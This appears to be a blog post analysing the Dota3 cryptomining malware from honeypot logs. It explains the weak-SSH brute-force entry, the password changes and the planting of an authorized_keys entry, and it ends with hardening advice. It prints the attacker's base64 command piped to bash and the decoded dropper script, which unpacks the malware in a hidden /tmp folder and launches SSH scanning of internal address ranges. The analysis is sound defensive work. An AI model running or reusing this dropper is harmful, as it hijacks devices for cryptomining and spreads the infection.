Dota Malware
Now when we are talking about Dota no we are not talking about a third game in Valves gaming franchise Dota, we are talking about Malware! Although Valve has Moba games called Dota and Dota 2, when we are talking about the Dota Malware Family Juniper Threat Labs has seen several variations of the Dota Malware with the latest variation being Dota3.
Now why do we care about Dota? Well in today’s world we are flooded with a vast number of devices that fall under the IoT or Internet of Things. A lot of these devices are being publicly hosted and available through SSH for management. Dota’s main attack vector is pursuing weak SSH logins utilizing vast dictionaries with default credentials. Once authentication is obtained the attacker will execute a series of commands to obtain system info, then continue to change the user password and maintain persistence by uploading their own SSH key to authorized_keys.
Main Goal of Dota — Find IoT devices with weak SSH credentials, gain access, gain persistence, install Dota which will add your hosts to a crypto mining campaign utilizing your endpoints resources to scan the internet and mine cryptocurrency.
An example of a real attack is shown below, this is an observation from my honeypot. Once the attacker successfully logged in using weak SSH passwords of deane/deane the attacker immediately started gathering system info and continued on to attempt password changes and storing it in /tmp/up.txt before finally uploading the Dota3 Malware.
Immediately after the Dota malware is uploaded to the honeypot the attacker attempts to execute some command that are base64 encoded.
Command: sleep 15s && cd /var/tmp; echo “IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4Cm1rZGlyIC5YMTktdW5peApjZCAuWDE5LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgxOS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMTktdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==” | base64 — decode | bash
When decoding this command we get the below output:
The output of the decoded commands is a script that removes previous directories that would have been created if the hosts was compromised before, then continues to move the malware uploaded to the server into the tmp folder for execution.
#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
mkdir .X19-unix
cd .X19-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X19-unix/.rsync/c
nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X19-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X19-unix/.rsync/initall 2>1&
Observing the logs produced by my honeypot for the month of March there are several attempts to upload malicious files with the name Dota or dota3. This just re-enforces the fact that just because malware has evolved into Dota3 does not mean that other variations of the malware are not going to still be seen in addition to Malware seen back in 2019 still being persistent in 2022.
Protecting Against Such Attacks:
We should only allow SSH authentication attempts from approved whitelisted IPs/Utilize a VPN.
2FA should be enabled on any public facing application now days, especially management devices.
Require RSA certificates to connect to SSH